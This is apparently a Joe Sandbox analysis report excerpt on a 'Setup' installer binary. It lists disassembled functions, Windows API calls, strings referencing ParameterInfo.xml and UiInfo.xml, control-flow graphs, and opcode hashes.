                                                                                              • Opcode Fuzzy Hash: 3cead472af1c5963832205292b00c165239845dbc5e9ec00099a8ea4bb333688
                                                                                              • Instruction Fuzzy Hash: 69418DB1915344CEDB20CFA9C6856DABBF4BB16308F604C7EC0599BB01C734D549CB65
                                                                                              Function 6C8F7B40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 95timethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C8F7B4A
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • GetCommandLineW.KERNEL32 ref: 6C8F7BB4
                                                                                              • _memset.LIBCMT ref: 6C8F7BF4
                                                                                              • GetTimeZoneInformation.KERNEL32(?), ref: 6C8F7C03
                                                                                              • GetThreadLocale.KERNEL32(00000007,?), ref: 6C8F7C3F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CommandH_prolog3H_prolog3_InformationLineLocaleThreadTimeZone_memset
                                                                                              • String ID: CommandLine = %s$Environment details$Initial LCID = %u$TimeZone = %s
                                                                                              • API String ID: 1050886296-4009495903
                                                                                              • Opcode ID: 61dff1d97b2f10643739edaf09a9069971ae7fa2e23e01d149bc00adf330dd36
                                                                                              • Instruction ID: b5bf8f223c56f83494ccb165e8c8c0e64fb753a81fead3eda96462aeae8dea8b
                                                                                              • Opcode Fuzzy Hash: 61dff1d97b2f10643739edaf09a9069971ae7fa2e23e01d149bc00adf330dd36
                                                                                              • Instruction Fuzzy Hash: 5C316B71900218EBEB20DBA4CD49FCDBBB9BF15304F154999E108E7A90DB74DA49CB51
                                                                                              Function 6394DBFF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 174comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394DC06
                                                                                                • Part of subcall function 6394D923: __EH_prolog3.LIBCMT ref: 6394D92A
                                                                                                • Part of subcall function 6394D923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D960
                                                                                                • Part of subcall function 6394D923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D9BA
                                                                                                • Part of subcall function 6394D923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394DA0D
                                                                                              • CoCreateInstance.OLE32(63947930,00000000,00000017,63947970,?,?,?,?,00000030,639562D8), ref: 6394DC48
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6394DC69
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394DE1D: __EH_prolog3.LIBCMT ref: 6394DE24
                                                                                                • Part of subcall function 6394DE1D: SysFreeString.OLEAUT32(00000000), ref: 6394DE6B
                                                                                                • Part of subcall function 6394CA39: __EH_prolog3.LIBCMT ref: 6394CA40
                                                                                                • Part of subcall function 6394CAC2: __EH_prolog3.LIBCMT ref: 6394CAC9
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6394DD4B
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6394DD87
                                                                                                • Part of subcall function 6394B93E: __EH_prolog3.LIBCMT ref: 6394B945
                                                                                              Strings
                                                                                              • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 6394DD19
                                                                                              • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 6394DDFE
                                                                                              • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 6394DC58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$FreeString$Path$CombineCreateException@8FileInstanceModuleNameRelativeThrow
                                                                                              • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                                                              • API String ID: 3627190661-2525052916
                                                                                              • Opcode ID: a5a8a47722aa409837923eeabf071edee7c04f837b89776d56d388ed18a27541
                                                                                              • Instruction ID: dd424bd96baef7788ea09933711363b3bd29733109cb65f563ed59ae1626d5c8
                                                                                              • Opcode Fuzzy Hash: a5a8a47722aa409837923eeabf071edee7c04f837b89776d56d388ed18a27541
                                                                                              • Instruction Fuzzy Hash: A3616272900209EFDB00DFE8CD84AEEB7B8AF19708F144559F161A7292D735DA45CF61
                                                                                              Function 6C8D5B82 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 93fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6C8D5B8C
                                                                                              • _memset.LIBCMT ref: 6C8D5BBB
                                                                                                • Part of subcall function 6C8F8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,6C9099FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 6C8F8E6E
                                                                                              • FindFirstFileW.KERNEL32(?,?,????), ref: 6C8D5BDA
                                                                                              • FindNextFileW.KERNELBASE(?,?), ref: 6C8D5CA8
                                                                                              • FindClose.KERNEL32(?), ref: 6C8D5CC1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$AppendCloseFirstH_prolog3_NextPath_memset
                                                                                              • String ID: ????
                                                                                              • API String ID: 2365859831-1216582215
                                                                                              • Opcode ID: 2c8515125e8572b53125d09b6559a0fb869ee941454d42691dc887ee4e17a4f5
                                                                                              • Instruction ID: 877da4c78e35d0d11ffd8355cd8a1817bdaf8467a019cb7525e01364510bb0ba
                                                                                              • Opcode Fuzzy Hash: 2c8515125e8572b53125d09b6559a0fb869ee941454d42691dc887ee4e17a4f5
                                                                                              • Instruction Fuzzy Hash: F231D271808219DADF20AFA4CD8DBDE73B8AF10359F114AA6E445D6A90DB35DA89CB10
                                                                                              Function 6C90B390 Relevance: 50.5, APIs: 12, Strings: 16, Instructions: 1496threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 6c90b390-6c90b4a9 call 6c926e52 call 6c90d446 call 6c90d713 call 6c8f833e call 6c90988c call 6c8f4e70 call 6c918f0e call 6c8f833e call 6c90988c call 6c918eab call 6c8ca8cc call 6c8f833e call 6c8f5033 call 6c918f0e call 6c8f51c0 SysFreeString call 6c918f0e call 6c90d01e call 6c8d59b8 call 6c8d6083 39 6c90b514-6c90b54d call 6c8d5e2b GetCommandLineW call 6c8c3e77 call 6c909293 0->39 40 6c90b4ab-6c90b50f call 6c8f833e * 2 call 6c8c838a call 6c918f0e * 2 call 6c8ca378 call 6c9214aa 0->40 53 6c90b555-6c90b5ac call 6c8f833e call 6c90988c call 6c8e4718 call 6c918f0e call 6c8f833e 39->53 54 6c90b54f 39->54 40->39 72 6c90b5b4-6c90b614 call 6c8f84b9 call 6c918f0e * 2 53->72 73 6c90b5ae 53->73 54->53 81 6c90b630-6c90b75a call 6c8e2d50 call 6c8e2d73 call 6c8c3a16 GetThreadLocale call 6c8c41d6 call 6c8f7889 call 6c8f7db0 call 6c8f7c9e call 6c8f7e78 call 6c8c43c4 call 6c8c5e41 72->81 82 6c90b616-6c90b620 call 6c8e4a3f 72->82 73->72 106 6c90b768-6c90b785 call 6c8f8f73 81->106 107 6c90b75c-6c90b762 81->107 85 6c90b625-6c90b627 82->85 85->81 87 6c90b629 85->87 87->81 119 6c90b787-6c90b7a6 call 6c918eab 106->119 120 6c90b7a8-6c90b7c2 call 6c8f833e 106->120 107->106 108 6c90b883-6c90b887 107->108 110 6c90b893-6c90b89c call 6c8f53e5 108->110 111 6c90b889-6c90b88d 108->111 115 6c90b8a1-6c90b8a3 110->115 111->110 113 6c90b956-6c90b9a8 call 6c8f6dcb call 6c8e2d2f call 6c8c4272 111->113 136 6c90b9c3-6c90b9c5 113->136 137 6c90b9aa-6c90b9b8 call 6c8c42b6 113->137 115->113 118 6c90b8a9-6c90b953 call 6c90cb31 call 6c8f833e call 6c90ce5c call 6c918f0e * 2 call 6c8f5a5a call 6c8e43ed call 6c8c41a9 call 6c8d5b32 call 6c90d6d1 call 6c926f06 115->118 130 6c90b7c9-6c90b7f7 call 6c8e2d50 call 6c8f75b5 call 6c918f0e 119->130 120->130 157 6c90b7f9-6c90b806 call 6c918f0e 130->157 158 6c90b80b-6c90b813 130->158 141 6c90b9c6-6c90ba05 call 6c8e6e46 call 6c918f0e call 6395e1ad 136->141 137->136 148 6c90b9ba-6c90b9bd 137->148 169 6c90ba07-6c90ba27 call 6c90cb31 141->169 170 6c90ba7c-6c90bab6 call 6c8e2d50 call 6c918f0e 141->170 148->136 152 6c90b9bf-6c90b9c1 148->152 152->141 157->158 161 6c90b820-6c90b84b call 6c8f8e8b 158->161 162 6c90b815-6c90b81b call 6c918f0e 158->162 183 6c90b850-6c90b852 161->183 162->161 179 6c90ba2c-6c90ba75 call 6c8f833e call 6c90ce5c call 6c8e6f61 call 6c8fbe94 call 6c918f0e * 2 169->179 197 6c90bae1-6c90bb00 call 6c8cbe2b 170->197 198 6c90bab8-6c90badc call 6c90cb31 170->198 179->170 188 6c90b854-6c90b859 call 6c8f7a1c 183->188 189 6c90b85e-6c90b87e call 6c918f0e * 3 183->189 188->189 189->108 212 6c90bbd0-6c90bc04 call 6c8e2d50 call 6c918f0e 197->212 213 6c90bb06-6c90bb0d 197->213 198->179 226 6c90bb2c-6c90bb74 call 6c8e2d50 call 6c90cec8 call 6c918f0e 212->226 232 6c90bc0a-6c90bc48 call 6c90cb31 call 6c8f833e call 6c90ce5c 212->232 213->212 216 6c90bb13-6c90bb1d call 6c91c0aa 213->216 222 6c90bb23-6c90bb29 216->222 223 6c90bbc8-6c90bbcb 216->223 222->226 223->226 242 6c90bb7a-6c90bbc0 call 6c8e6f61 call 6c8fbe94 call 6c918f0e * 2 226->242 243 6c90bc5b-6c90bc68 call 6c8c4272 226->243 246 6c90bc4b-6c90bc56 232->246 242->223 249 6c90bc6a-6c90bc78 call 6c8c42b6 243->249 250 6c90bc7f-6c90bccc call 6c90cb31 call 6c8f833e call 6c90ce5c 243->250 246->243 249->250 259 6c90bc7a-6c90bc7d 249->259 278 6c90bcce-6c90bcda 250->278 259->250 261 6c90bcdf-6c90bd02 call 6c8f833e call 6c8c4552 259->261 275 6c90bd72-6c90bdcb call 6c8e2d50 call 6c8f586d call 6c918f0e call 6c8f594b 261->275 276 6c90bd04-6c90bd6d call 6c90cb31 call 6c8f833e call 6c90ce5c call 6c918f0e 261->276 295 6c90bdd1-6c90bdd6 275->295 296 6c90beed-6c90bf26 call 6c8e2d50 call 6c918f0e 275->296 276->278 278->246 297 6c90bddc-6c90be85 call 6c8f833e call 6c8fae4a call 6c8c420c call 6c8f7a92 CloseHandle call 6c918f0e * 2 call 6c8e6f61 call 6c8fbe94 call 6c918f0e * 2 295->297 298 6c90be8d-6c90bee8 call 6c90cb31 call 6c8f833e call 6c90ce5c CloseHandle call 6c918f0e 295->298 317 6c90bf28-6c90bf91 CloseHandle call 6c918f0e * 2 call 6c8e6f61 call 6c8fbe94 call 6c918f0e * 2 296->317 318 6c90bf9b-6c90c011 call 6c8e2d50 call 6c8e8fce call 6c8c4486 call 6c918f0e 296->318 297->298 298->296 317->318 345 6c90c100-6c90c16c call 6c8c4486 call 6c8f833e call 6c918f0e 318->345 346 6c90c017-6c90c01b 318->346 386 6c90c17b-6c90c233 GetTempPathW call 6c918afc call 6c8e2d73 call 6c8e2d50 call 6c8f8c7a call 6c8f8c24 call 6c8fff21 call 6c918f0e * 4 CreateDirectoryW 345->386 387 6c90c16e-6c90c178 call 6c918d3a 345->387 350 6c90c023-6c90c030 call 6c8c420c 346->350 351 6c90c01d-6c90c021 346->351 350->345 353 6c90c036-6c90c03d call 6c8e9048 350->353 351->350 351->353 363 6c90c042-6c90c04c 353->363 374 6c90c053-6c90c060 363->374 375 6c90c04e-6c90c051 363->375 377 6c90c0a4-6c90c0e5 call 6c8c420c call 6c8f7a92 call 6c918f0e 374->377 384 6c90c062-6c90c06b 374->384 375->377 396 6c90c0ea-6c90c0f3 377->396 384->396 397 6c90c06d-6c90c09d call 6c8f833e call 6c8fb057 call 6c918f0e 384->397 427 6c90c235-6c90c240 GetLastError 386->427 428 6c90c25c-6c90c275 call 6c8f833e call 6c8f84b9 386->428 387->386 396->345 404 6c90c0f5-6c90c0fb call 6c90d713 396->404 397->377 404->345 427->428 429 6c90c242-6c90c25a call 6c8c5d3f call 6c8f84b9 427->429 437 6c90c278-6c90c3ec call 6c918f0e * 2 call 6c90d779 call 6c90e449 call 6c8c59a2 call 6c8f1494 call 6c8c5d3f call 6c918eab call 6c8c4486 428->437 429->437 458 6c90c3f4-6c90c4e1 call 6c8c59a2 call 6c918f0e call 6c8c4460 call 6c8e76bb call 6c918f0e call 6c8c4460 call 6c8e76bb call 6c918f0e call 6c8c4460 call 6c918f0e 437->458 459 6c90c3ee 437->459 480 6c90c4e3-6c90c4f2 458->480 481 6c90c4f5-6c90c52f call 6c8e7053 458->481 459->458 480->481 485 6c90c535-6c90c622 call 6c90cb31 call 6c8f833e call 6c90ce5c call 6c8e7148 call 6c8e7773 * 2 call 6c8e7292 call 6c918f0e * 2 call 6c8e7292 call 6c90e49e call 6c90d985 call 6c918f0e * 2 481->485 486 6c90c627-6c90c670 481->486 485->486 497 6c90c674-6c90c6a5 486->497 508 6c90c6a7-6c90c6c0 497->508 509 6c90c6cc-6c90c6e8 call 6c8c420c 497->509 508->509 515 6c90c6c2-6c90c6c9 508->515 521 6c90c713-6c90c740 call 6c8f7a92 call 6c8e2d50 509->521 522 6c90c6ea-6c90c6f8 509->522 515->509 534 6c90c742-6c90c750 call 6c9163d7 521->534 535 6c90c755-6c90c8ec call 6c918f0e call 6c8e7148 call 6c8e7773 * 2 call 6c8e7292 call 6c918f0e * 2 call 6c8e7292 call 6c90e49e call 6c90d985 call 6c918f0e * 3 CloseHandle call 6c918f0e * 2 call 6c8e6f61 call 6c8fbe94 call 6c918f0e * 2 call 6c8f5a5a call 6c8e43ed call 6c8c41a9 call 6c8d5b32 call 6c90d6d1 521->535 525 6c90c6fa-6c90c6fd 522->525 526 6c90c6ff-6c90c70d 522->526 525->521 525->526 526->521 534->535
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6C90B39A
                                                                                                • Part of subcall function 6C90D446: __EH_prolog3_catch.LIBCMT ref: 6C90D44D
                                                                                                • Part of subcall function 6C90D446: GetCommandLineW.KERNEL32(0000006C,6C90B3B6,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C90D48E
                                                                                                • Part of subcall function 6C90D446: CoInitialize.OLE32(00000000), ref: 6C90D4EF
                                                                                                • Part of subcall function 6C90D713: CreateThread.KERNEL32(00000000,00000000,6C9123E8,?,00000000,00000000), ref: 6C90D729
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                                • Part of subcall function 6C90988C: __EH_prolog3.LIBCMT ref: 6C909893
                                                                                                • Part of subcall function 6C90988C: GetCommandLineW.KERNEL32(0000002C,6C90D52A,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C9098B4
                                                                                                • Part of subcall function 6C90988C: PathIsRelativeW.SHLWAPI(?,?,?,00000000,?,UiInfo.xml,?,?,00000000,?), ref: 6C90996E
                                                                                                • Part of subcall function 6C8F4E70: __EH_prolog3.LIBCMT ref: 6C8F4E77
                                                                                                • Part of subcall function 6C8F4E70: __CxxThrowException@8.LIBCMT ref: 6C8F4F68
                                                                                                • Part of subcall function 6C8F4E70: ReadFile.KERNEL32(?,?,00000002,?,00000000,?,80000000,00000001,00000003,00000080,00000000,?,?,?,?,0000002C), ref: 6C8F4F7E
                                                                                                • Part of subcall function 6C8F4E70: CloseHandle.KERNEL32(?), ref: 6C8F4FA1
                                                                                                • Part of subcall function 6C8CA8CC: __EH_prolog3.LIBCMT ref: 6C8CA8D3
                                                                                                • Part of subcall function 6C8CA8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA90B
                                                                                                • Part of subcall function 6C8CA8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C8CA964
                                                                                                • Part of subcall function 6C8CA8CC: __CxxThrowException@8.LIBCMT ref: 6C8CAA28
                                                                                                • Part of subcall function 6C8F5033: __EH_prolog3.LIBCMT ref: 6C8F503A
                                                                                                • Part of subcall function 6C8F5033: __CxxThrowException@8.LIBCMT ref: 6C8F50B6
                                                                                                • Part of subcall function 6C8F51C0: __EH_prolog3_catch.LIBCMT ref: 6C8F51C7
                                                                                                • Part of subcall function 6C8F51C0: CoInitialize.OLE32(00000000), ref: 6C8F51DC
                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C90B471
                                                                                                • Part of subcall function 6C90D01E: __EH_prolog3.LIBCMT ref: 6C90D025
                                                                                                • Part of subcall function 6C90D01E: PathFileExistsW.SHLWAPI(?,6C8B61FC,graphics,?,00000054,6C90B48A,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C90D0BE
                                                                                                • Part of subcall function 6C8D59B8: __EH_prolog3.LIBCMT ref: 6C8D59BF
                                                                                                • Part of subcall function 6C8D6083: __EH_prolog3_catch.LIBCMT ref: 6C8D608A
                                                                                              • GetCommandLineW.KERNEL32(?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml,?,?,00000738,6C8FFA6E,?), ref: 6C90B51F
                                                                                                • Part of subcall function 6C8C838A: __EH_prolog3.LIBCMT ref: 6C8C8391
                                                                                                • Part of subcall function 6C8CA378: __EH_prolog3.LIBCMT ref: 6C8CA37F
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C90B50F
                                                                                                • Part of subcall function 6C9214AA: KiUserExceptionDispatcher.NTDLL(?,?,6C91C129,00000C00,?,?,?,?,6C91C129,00000C00,6C93BA3C,6C9576D4,00000C00,00000020,6C8FF845,?), ref: 6C9214EC
                                                                                                • Part of subcall function 6C8C3A16: __EH_prolog3.LIBCMT ref: 6C8C3A1D
                                                                                              • GetThreadLocale.KERNEL32(?,passive,00000000), ref: 6C90B6C8
                                                                                                • Part of subcall function 6C8F7889: __EH_prolog3.LIBCMT ref: 6C8F7890
                                                                                                • Part of subcall function 6C8F7DB0: __EH_prolog3.LIBCMT ref: 6C8F7DB7
                                                                                                • Part of subcall function 6C8F7C9E: __EH_prolog3.LIBCMT ref: 6C8F7CA5
                                                                                                • Part of subcall function 6C8F7E78: __EH_prolog3.LIBCMT ref: 6C8F7E7F
                                                                                                • Part of subcall function 6C8C43C4: __EH_prolog3.LIBCMT ref: 6C8C43CB
                                                                                                • Part of subcall function 6C8C5E41: __EH_prolog3.LIBCMT ref: 6C8C5E48
                                                                                                • Part of subcall function 6C8C5E41: PathFindFileNameW.SHLWAPI(?,?,?,0000000C,6C8C5E13,?,6C8F831D,?,0000000C,6C8C7D3D,?,00000000,?,?,6C8BAB18,00000008), ref: 6C8C5E83
                                                                                                • Part of subcall function 6C8C5E41: PathFindExtensionW.SHLWAPI(?), ref: 6C8C5EA0
                                                                                                • Part of subcall function 6C8F6DCB: GetCommandLineW.KERNEL32(38D98A99,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,?,?,00000000,?,?), ref: 6C8F6E16
                                                                                                • Part of subcall function 6C8F594B: __EH_prolog3.LIBCMT ref: 6C8F5952
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,OneInstance,?,00000000,?,ParameterInfo.xml,?,?,00000738,6C8FFA6E,?,6C8BA794,02F92298), ref: 6C90BED4
                                                                                                • Part of subcall function 6C8FAE4A: __EH_prolog3.LIBCMT ref: 6C8FAE51
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,?,00000001,00000007,?,OneInstance,?,?,00000000,?,?,?,?,?), ref: 6C90BE22
                                                                                                • Part of subcall function 6C8E6F61: __EH_prolog3.LIBCMT ref: 6C8E6F68
                                                                                                • Part of subcall function 6C8FBE94: _free.LIBCMT ref: 6C8FBEBC
                                                                                                • Part of subcall function 6C8FBE94: _free.LIBCMT ref: 6C8FBECD
                                                                                              • CloseHandle.KERNEL32(?), ref: 6C90BF2E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Path$CloseCommandException@8FileH_prolog3_catchHandleLineThrow$FindInitializeNameRelativeThread_free$CreateDispatcherExceptionExistsExtensionFreeLocaleModuleReadStringUser
                                                                                              • String ID: !$#(loc.ids_wer_message)$%TEMP%\$Blocker$Command-line option error: $CreateFilesInUser$CreateHelpUsage$CreateUiMode$FactoryInitialization$InvalidArguments$OneInstance$PISemanticChecker$ParameterInfo.xml$Parameterinfo.xml or UiInfo.xml has a #Loc that is not defined in LocalizeData.xml $W$passive
                                                                                              • API String ID: 5912831-280204926
                                                                                              • Opcode ID: 5d9db8bb0ec6777c420896c18ba0bdd36d5b6dfb54068ee98168eb6e196aaba1
                                                                                              • Instruction ID: 8cd951a7dd3585bc667bf864ada0fab9d9ca7eaa443a7ad30a48cbecb3fe1b66
                                                                                              • Opcode Fuzzy Hash: 5d9db8bb0ec6777c420896c18ba0bdd36d5b6dfb54068ee98168eb6e196aaba1
                                                                                              • Instruction Fuzzy Hash: 05E2797190025CDFCF21DFA8C944ADDBBB9AF19318F148599E418B7791CB30AA89CF61
                                                                                              Function 6396697A Relevance: 49.5, APIs: 16, Strings: 12, Instructions: 457comCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 594 6396697a-639669b6 call 6397265b call 63951e75 CoCreateInstance 599 63966a36-63966a87 call 6395e8e8 call 639650fb PathIsRelativeW 594->599 600 639669b8-63966a10 call 6394c98c call 6394b93e call 63968460 call 6394b93e 594->600 620 63966a94-63966ac5 call 639683fd call 6395f21d PathFileExistsW * 2 599->620 621 63966a89 599->621 614 63966a12-63966a14 600->614 615 63966a18-63966a33 call 63968460 * 2 call 63972709 600->615 614->615 633 63966ac7-63966acd call 6395ea8d 620->633 634 63966ad2-63966ad9 call 63968460 620->634 625 63966a92 621->625 628 63966ade-63966b23 call 63967cdc call 6394b93e 625->628 641 63966df0-63966ed5 call 6395e8e8 * 2 call 639680ba call 63968460 * 2 call 6395e8e8 628->641 642 63966b29-63966b2e 628->642 633->634 634->628 642->641 643 63966b34-63966b56 CoCreateInstance 642->643 645 63966bd3-63966bf0 call 6395e8e8 PathIsRelativeW 643->645 646 63966b58-63966bb1 call 6394c98c call 6394b93e call 63968460 call 6394b93e 643->646 653 63966bf2-63966bfb 645->653 654 63966bfd-63966c2e call 639683fd call 6395f21d PathFileExistsW * 2 645->654 673 63966bb3-63966bb5 646->673 674 63966bb9-63966bce VariantClear call 63968460 646->674 662 63966c47-63966c80 call 6394b93e call 63967cdc 653->662 670 63966c30-63966c36 call 6395ea8d 654->670 671 63966c3b-63966c42 call 63968460 654->671 683 63966c84-63966c96 VariantClear 662->683 670->671 671->662 673->674 674->645 685 63966cb0-63966cbf 683->685 686 63966c98-63966cab call 6396dbdb 683->686 689 63966cc7-63966d19 VariantClear 685->689 690 63966cc1-63966cc3 685->690 686->685 701 63966d1f-63966db0 call 6395e8e8 call 639680ba call 63968460 call 6395e8e8 call 6394ca39 689->701 702 63966db8-63966dc1 689->702 690->689 701->702 703 63966dc3-63966dc5 702->703 704 63966dc9-63966ddd call 63968460 702->704 703->704 712 63966de5-63966de9 VariantClear 704->712 713 63966ddf-63966de1 704->713 712->641 713->712
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63966981
                                                                                                • Part of subcall function 63951E75: __EH_prolog3.LIBCMT ref: 63951E7C
                                                                                                • Part of subcall function 63951E75: GetThreadLocale.KERNEL32(?,00000004,63956734,0000004C,0000004C,63957142,?,00000000), ref: 63951E8E
                                                                                              • CoCreateInstance.OLE32(63947980,00000000,00000017,63947970,?,?,00000068,639665A6,?,?,?,?,63962A30,?,00000000,?), ref: 639669AC
                                                                                              • PathIsRelativeW.SHLWAPI(?,?,?,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000), ref: 63966A7F
                                                                                              • PathFileExistsW.KERNELBASE(?,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271), ref: 63966A8C
                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008), ref: 63966ABE
                                                                                              • PathFileExistsW.SHLWAPI(?,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?,?,00000000,00000008,6395E271), ref: 63966AC1
                                                                                              • CoCreateInstance.OLE32(63947990,00000000,00000017,639479A0,?), ref: 63966B4C
                                                                                                • Part of subcall function 6394C98C: GetThreadLocale.KERNEL32 ref: 6394C999
                                                                                                • Part of subcall function 6394B93E: __EH_prolog3.LIBCMT ref: 6394B945
                                                                                                • Part of subcall function 6395F21D: PathAppendW.SHLWAPI(00000000,00000000,?,00000105,?,?,80070057,80070057,6394C3AE), ref: 6395F241
                                                                                              • VariantClear.OLEAUT32(?), ref: 63966BBD
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • PathIsRelativeW.SHLWAPI(?,?), ref: 63966BE8
                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 63966BF5
                                                                                              • PathFileExistsW.KERNELBASE(?,?), ref: 63966C27
                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 63966C2A
                                                                                              • VariantClear.OLEAUT32(?), ref: 63966C8E
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63966CAB
                                                                                              • VariantClear.OLEAUT32(?), ref: 63966CED
                                                                                              • VariantClear.OLEAUT32(?), ref: 63966DE9
                                                                                                • Part of subcall function 6394CA39: __EH_prolog3.LIBCMT ref: 6394CA40
                                                                                              Strings
                                                                                              • http://schemas.microsoft.com/SetupUI/2008/01/imui, xrefs: 63966C7A
